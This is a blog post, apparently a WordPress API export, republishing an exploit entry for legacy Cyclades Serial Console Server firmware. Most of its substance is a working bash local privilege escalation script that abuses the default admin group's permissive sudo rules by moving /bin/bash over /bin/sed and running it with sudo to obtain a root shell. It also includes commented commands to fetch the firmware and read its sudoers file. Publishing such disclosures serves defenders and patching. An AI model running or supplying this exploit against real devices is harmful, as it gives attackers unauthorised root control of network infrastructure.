# Exploit Title: Cyclades Serial Console Server 3.3.0 – Local Privilege Escalation
\n# Date: 09 Feb 2022
\n# Exploit Author: @ibby
\n# Vendor Homepage: https:\/\/www.vertiv.com\/en-us\/
\n# Software Link: https:\/\/downloads2.vertivco.com\/SerialACS\/ACS\/ACS_v3.3.0-16\/FL0536-017.zip
\n# Version: Legacy Versions V_1.0.0 to V_3.3.0-16
\n# Tested on: Cyclades Serial Console Server software (V_1.0.0 to V_3.3.0-16)
\n# CVE : N\/A<\/p>\n
# The reason this exists, is the admin user & user group is the default user for these devices. The software ships with overly permissive sudo privileges
\n## for any user in the admin group, or the default admin user. This vulnerability exists in all legacy versions of the software – the last version being from ~2014.
\n### This vulnerability does not exist in the newer distributions of the ACS Software.<\/p>\n
#!\/bin\/bash<\/p>\n
## NOTE: To view the vulnerability yourself, uncomment the below code & run as sudo, since it’s mounting a file system.
\n## The software is publicly available, this will grab it and unpack the firmware for you.<\/p>\n
#TMPDIR=$(mktemp -d)
\n#curl ‘https:\/\/downloads2.vertivco.com\/SerialACS\/ACS\/ACS_v3.3.0-16\/FL0536-017.zip’ -o FL0536-017.zip && unzip FL0536-017.zip $$ binwalk -e FL0536-017.bin
\n#sudo mount -o ro,loop _FL0536-017.bin.extracted\/148000 $TMPDIR && sudo cat “$TMPDIR\/etc\/sudoers”
\n#echo “As you can see, the sudo permissions on various binaries, like that of \/bin\/mv, are risky.”<\/p>\n
# ! EXPLOIT CODE BELOW ! #
\n# ——-
\n# Once you exit the root shell, this will clean up and put the binaries back where they belong.
\necho “Creating backups of sed & bash binaries”
\nsudo cp \/bin\/sed \/bin\/sed.bak
\nsudo cp \/bin\/bash \/bin\/bash.bak
\necho “Saved as bash.bak & sed.bak”
\nsudo mv \/bin\/bash \/bin\/sed
\nsudo \/bin\/sed
\necho “Replacing our binary with the proper one”
\nsudo mv \/bin\/bash.bak \/bin\/bash && sudo mv \/bin\/sed.bak \/bin\/sed<\/p>\n","protected":false},"excerpt":{"rendered":"
# Exploit Title: Cyclades Serial Console Server 3.3.0 – Local Privilege Escalation # Date: 09 Feb 2022 # Exploit Author: @ibby # Vendor Homepage: https:\/\/www.vertiv.com\/en-us\/ # Software Link: https:\/\/downloads2.vertivco.com\/SerialACS\/ACS\/ACS_v3.3.0-16\/FL0536-017.zip # Version: Legacy Versions V_1.0.0 to V_3.3.0-16 # Tested on: Cyclades Serial Console Server software (V_1.0.0 to V_3.3.0-16) # CVE : N\/A # The reason this …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-20917","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/20917","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=20917"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/20917\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=20917"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=20917"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=20917"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}